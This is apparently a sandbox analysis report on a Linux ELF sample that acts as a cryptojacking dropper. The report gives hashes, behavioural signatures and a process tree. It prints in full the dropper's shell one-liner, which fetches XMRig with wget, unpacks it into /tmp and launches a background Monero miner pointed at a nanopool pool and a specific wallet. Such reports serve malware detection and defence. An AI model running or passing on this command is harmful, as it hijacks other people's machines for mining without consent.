Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
  max time kernel:  58s
  max time network: 133s
  platform:         ubuntu-20.04_amd64
  resource:         ubuntu2004-amd64-20240221-en
  resource tags:    arch:amd64, arch:i386, image:ubuntu2004-amd64-20240221-en, kernel:5.4.0-169-generic, locale:en-us, os:ubuntu-20.04-amd64, system
  submitted:        06/03/2024, 12:31
Static task: static1
Behavioral task: behavioral1
  Sample:   SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf
  Resource: ubuntu2004-amd64-20240221-en
General
  Target: SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf
  Size:   28KB
  MD5:    81959aa15f618e7f878587c3fbee558f
  SHA1:   63f4ff2f4e073f771f3360a97a91d83cb7f397a7
  SHA256: 884107422df524c5d7584f267910c4d738fa09187a6f835374038ed27c2a4fc8
  SHA512: 1cb22d5f938921717cc8ed77bb9fc3250a85e7256ae26c7503e2890d434e9bf4b559708f32cab301b482825c8ca86ce5b60b3b9b45700334537d5f12c9cc64b0
  SSDEEP: 768:Z0TF6I/0OdgyoCJSqeYCU7hWdj8qFCT5FL9GI0:ZwH8O67CCg7YdAMCTe
Malware Config
Signatures

xmrig
  XMRig is a high performance, open source, cross platform CPU/GPU miner.

Changes its process name (1 IoC)
  description: Changes the process name, possibly in an attempt to hide itself
  pid:         1466
  process:     SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf

Modifies Watchdog functionality (1 TTP, 2 IoCs)
  Malware like Mirai modifies the Watchdog to prevent it from restarting an infected system.
  ioc: File opened for modification /dev/watchdog
  ioc: File opened for modification /dev/misc/watchdog

Reads runtime system information (4 IoCs)
  Reads data from the /proc virtual filesystem.
  ioc: File opened for reading /proc/filesystems                 process: tar
  ioc: File opened for reading /proc/sys/kernel/random/boot_id   process: tar
  ioc: File opened for reading /proc/filesystems                 process: mv
  ioc: File opened for reading /proc/self/exe                    process: SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf

Writes file to tmp directory (4 IoCs)
  Malware often drops required files in the /tmp directory.
  ioc: File opened for modification /tmp/xmrig-6.21.1/config.json        process: tar
  ioc: File opened for modification /tmp/xmrig-6.21.1-linux-x64.tar.gz   process: wget
  ioc: File opened for modification /tmp/xmrig-6.21.1/xmrig              process: tar
  ioc: File opened for modification /tmp/xmrig-6.21.1/SHA256SUMS         process: tar
Processes

/tmp/SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf (PID 1466)
  command:    /tmp/SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf
  signatures: Changes its process name; Reads runtime system information

  /bin/sh (PID 1469)
    command: sh -c "wget https://github.com/xmrig/xmrig/releases/download/v6.21.1/xmrig-6.21.1-linux-x64.tar.gz && tar -xzf xmrig-6.21.1-linux-x64.tar.gz && mv xmrig-6.21.1 /tmp/ && rm -rf xmrig-6.21.1-linux-x64.tar.gz && cd /tmp/xmrig-6.21.1 && chmod 777 * && ./xmrig --opencl --cuda -o xmr-eu1.nanopool.org:14433 -u 49WVNTHfo5c7zfYi3METsCPW93hLJFYNKBS5GZDxSbuZA1FNJULGvkkY5y7sDozjTTMgeT3JyqLfV38TGzqMPuiGJzeHmeZ --tls --coin monero --background"

    /usr/bin/wget (PID 1473)
      command:    wget https://github.com/xmrig/xmrig/releases/download/v6.21.1/xmrig-6.21.1-linux-x64.tar.gz
      signatures: Writes file to tmp directory

    /usr/bin/tar (PID 1931)
      command:    tar -xzf xmrig-6.21.1-linux-x64.tar.gz
      signatures: Reads runtime system information; Writes file to tmp directory

      /usr/local/sbin/gzip (PID 1932)  command: gzip -d
      /usr/local/bin/gzip  (PID 1932)  command: gzip -d
      /usr/sbin/gzip       (PID 1932)  command: gzip -d
      /usr/bin/gzip        (PID 1932)  command: gzip -d
      (The same PID is listed under four paths because tar's child searches PATH for gzip; only the last path, /usr/bin/gzip, exists on this image and actually runs.)

    /usr/bin/mv (PID 1933)
      command:    mv
      signatures: Reads runtime system information
Network
MITRE ATT&CK Enterprise v15
Downloads